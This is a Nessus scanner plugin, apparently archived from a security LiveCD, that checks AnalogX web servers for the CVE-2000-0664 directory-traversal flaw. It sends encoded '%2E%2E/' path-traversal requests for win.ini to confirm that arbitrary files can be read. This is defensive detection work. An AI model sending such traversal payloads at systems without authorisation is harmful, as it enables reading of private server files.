home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / analogx_traversal.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  84 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10489);
  10.  script_bugtraq_id(1508);
  11.  script_version ("$Revision: 1.12 $");
  12.  script_cve_id("CVE-2000-0664");
  13.  
  14.  name["english"] = "AnalogX web server traversal";
  15.  name["francais"] = "Analogx Web server traversal";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "
  19. It is possible to read arbitrary files on
  20. the remote server by prepending %2E%2E/%2E%2E/
  21. in front of the file name sent as a URL string to the 
  22. remote web server.
  23.  
  24. Solution : If you are using AnalogX SimpleServer:www, 
  25. upgrade to the latest version. If you are using another web 
  26. server, contact your vendor for a patch.
  27.  
  28. Risk factor : High";
  29.  
  30.  desc["francais"] = "Il est possible de lire
  31. n'importe quel fichier sur la machine distante
  32. en ajoutant %2E%2E/%2E%2E devant leur nom.
  33.  
  34.  
  35. Solution : Si vous utilisez le SimpleServer:www d'AnalogX,
  36. alors mettez-le α jour en version 1.07. Sinon contactez
  37. votre vendeur et demandez un patch
  38. Facteur de risque : ElevΘ";
  39.  
  40.  script_description(english:desc["english"], francais:desc["francais"]);
  41.  
  42.  summary["english"] = "%2E%2E/%2E%2E/file.txt";
  43.  summary["francais"] = "%2E%2E/%2E%2E/file.txt";
  44.  script_summary(english:summary["english"], francais:summary["francais"]);
  45.  
  46.  script_category(ACT_ATTACK);
  47.  
  48.  
  49.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  50.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  51.  family["english"] = "CGI abuses";
  52.  family["francais"] = "Abus de CGI";
  53.  script_family(english:family["english"], francais:family["francais"]);
  54.  script_dependencie("find_service.nes");
  55.  script_require_ports("Services/www", 80);
  56.  exit(0);
  57. }
  58.  
  59. #
  60. # The script code starts here
  61. #
  62. include("http_func.inc");
  63.  
  64. port = get_http_port(default:80);
  65.  
  66.  
  67. if(! get_port_state(port)) exit(0);
  68.  
  69. req1 = http_get(item:"%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini", port:port);
  70. req2 = http_get(item:"%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win.ini", port:port);
  71.  
  72. if (check_win_dir_trav(port: port, url: req1, quickcheck: 0))
  73. {
  74.   security_hole(port);
  75.   exit(0);
  76. }
  77.  
  78. if (check_win_dir_trav(port: port, url: req2, quickcheck: 0))
  79. {
  80.   security_hole(port);
  81.   exit(0);
  82. }
  83.  
  84.